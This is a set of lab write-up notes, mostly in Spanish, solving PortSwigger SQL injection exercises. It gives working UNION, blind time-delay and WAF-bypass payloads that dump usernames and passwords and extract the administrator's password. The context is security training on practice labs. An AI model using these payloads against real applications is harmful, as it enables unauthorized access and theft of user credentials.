## SQLi
: Fuente: https://portswigger.net/web-security/sql-injection/cheat-sheet


## 4. Lab: SQL injection UNION attack, retrieving data from other tables

### CHALLENGE
This lab contains an SQL injection vulnerability in the product category filter. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables. To construct such an attack, you need to combine some of the techniques you learned in previous labs.

The database contains a different table called **users**, with columns called **username** and **password**.

To solve the lab, perform an **SQL injection UNION** attack that retrieves all usernames and passwords, and use the information to log in as the **administrator** user. 


### SOLUTION

Similar a la consulta anterior pero limitandola limit **0,1** ... **1,1** ... **2,1** ... **3,1**
```sql
select password,subscription from users where username='%s' union select 1, schema_name from information_schema.schemata limit 0,1;-- -';

select password,subscription from users where username='%s' union select 1, group_concat(username,':',password) from users;-- -';
```

Si no resuelve los **:** ponerlo en hexadecimal cambiado de **:** a **0x3a**
```sql
select password,subscription from users where username='%s' union select 1, group_concat(username,0x3a,password) from users;-- -';
```

Si ya conocer el usuario del que deseas saber la contraseña, puede convertir esa nombre de usuario a hexadecimal
```sql
select password,subscription from users where username='%s' union select 1,password from users where username='admin';-- -';
```
```sh
$ echo 'admin' | tr -d '\n' | xxd -ps
61646d696e
```

```sql
select password,subscription from users where username='%s' union select 1,password from users where username=0x61646d696e;-- -';
```

otra manera de concatenar
```
' union select NULL,username||':'||password from users-- -
```


Verificamos el numero de columnas:
```
https://<...>.web-security-academy.net/filter?category=Accessories' order by 2-- -
```

Verificamos en que columna nos es posible introducir contenido para hacer la inyección
```
https://<..>.web-security-academy.net/filter?category=Accessories' union select NULL,NULL-- -
https://<..>.web-security-academy.net/filter?category=Accessories' union select NULL,'Hi'-- -
```

Obtenemos los datos de las columnas **username** and **password** de la tabla **users**
```
https://<..>.web-security-academy.net/filter?category=Accessories' union select username,password from users-- -
```

Si esteticamente deseamos tenemos en una misma linea
```
https://<..>.web-security-academy.net/filter?category=Accessories' union select NULL,username||':'||password from users-- -

https://<..>.web-security-academy.net/filter?category=Accessories' union select NULL,username||':'||password from users where username='administrator'-- -
```


### Aditional material

- Listar las BDs. La consulta genera una salida por cada resultado obtenido de **schema_name from information_schema.schemata**
```
select password,subscription from users where username='%s' union select 1, schema_name from information_schema.schemata;-- -';

' union select schema_name,NULL from information_schema.schemata-- -
```

Similar a la consulta anterior pero agrupandolo para que salga en el mismo campo
```sql
select password,subscription from users where username='%s' union select 1, group_concat(schema_name) from information_schema.schemata;-- -';
```


Similar a la consulta anterior pero limitandola limit **0,1** ... **1,1** ... **2,1** ... **3,1**
```sql
select password,subscription from users where username='%s' union select 1, schema_name from information_schema.schemata limit 0,1;-- -';
```

- Listar las tabla`
```
' union select table_name,NULL from information_schema.tables where table_schema='public'-- -
```

- Listar columnas de una tabla
```
' union select column_name,NULL from information_schema.colums where table_schema='public'-- -
```


## Lab: Blind SQL injection with time delays

This lab contains a **blind SQL injection** vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.

To solve the lab, exploit the **SQL injection** vulnerability to cause a 10 second delay. 


MySQL:
Si la respuesta de la condicional es correcta tardara 5 segundos en responder
```
select * from users where username='admin' and if(substr(database(),1,1)='a',sleep(5),1);-- -';


' || sleep(5)-- -
```


PosgreSQL: Para este Lab la BD esta en un GBD PostgreSQL
```
' || (select pg_sleep(10))-- -
' || pg_sleep(10)-- -
```


## Lab: Blind SQL injection with time delays and information retrieval

This lab contains a **blind SQL injection** vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows or causes an error. However, since the query is executed synchronously, it is possible to trigger conditional time delays to infer information.

The database contains a different table called users, with columns called **username** and **password**. You need to exploit the **blind SQL injection** vulnerability to find out the password of the **administrator** user.

To solve the lab, log in as the administrator user.


Obtener el numero de caracteres:
```
' || (select case when (1=1) then pg_sleep(5) else pg_sleep(0) end from users where username='administrator' and length(password)>=20)
```

```
'||(select case when (1=1) then pg_sleep(5) else pg_sleep(0) end from users where username='administrator' and length(password)>=20)-- - 
```

Comprobar si la cuenta de usuario empieza por la letra **a**
```
'||(select case when substring(username,1,1)='a' then pg_sleep(5) else pg_sleep(0) end from users where username='administrator')-- - ;
```

Para solventarlo se ha creado el script **ConditionalTimeDelays.py**


## Lab: SQL injection with filter bypass via XML encoding

This lab contains a **SQL injection** vulnerability in its stock check feature. The results from the query are returned in the application's response, so you can use a UNION attack to retrieve data from other tables.

The database contains a **users** table, which contains the usernames and passwords of registered users. To solve the lab, perform a SQL injection attack to retrieve the admin user's credentials, then log in to their account. 

**Hint**: A web application firewall (WAF) will block requests that contain obvious signs of a SQL injection attack. You'll need to find a way to obfuscate your **malicious query to bypass this filter**. We recommend using the **Hackvertor** extension to do this.


```
' order by 2-- -
Output:
HTTP/1.1 403 Forbidden
Content-Type: application/json; charset=utf-8
Connection: close
Content-Length: 17

"Attack detected"
```

Para enable Hacvertor en BurpSuite se ha de ir a **Extender** >> Tab: **BApp Store**

Para ofuscar el código se ha de seleccionar el código deseado, botón derecho del ratón sobre ello **Extensions** >> **Hackvector** >> **Encode** >> **hex_entities**
```
<storeId>
1' order by 2-- -
</storeId>
```

Quedando algo como lo siguiente:
```
1 union select version()-- -

or 

<storeId>
  <@hex_entities>
    1 union select password from users where username='administrator'-- -
  <@/hex_entities>
</storeId>
```
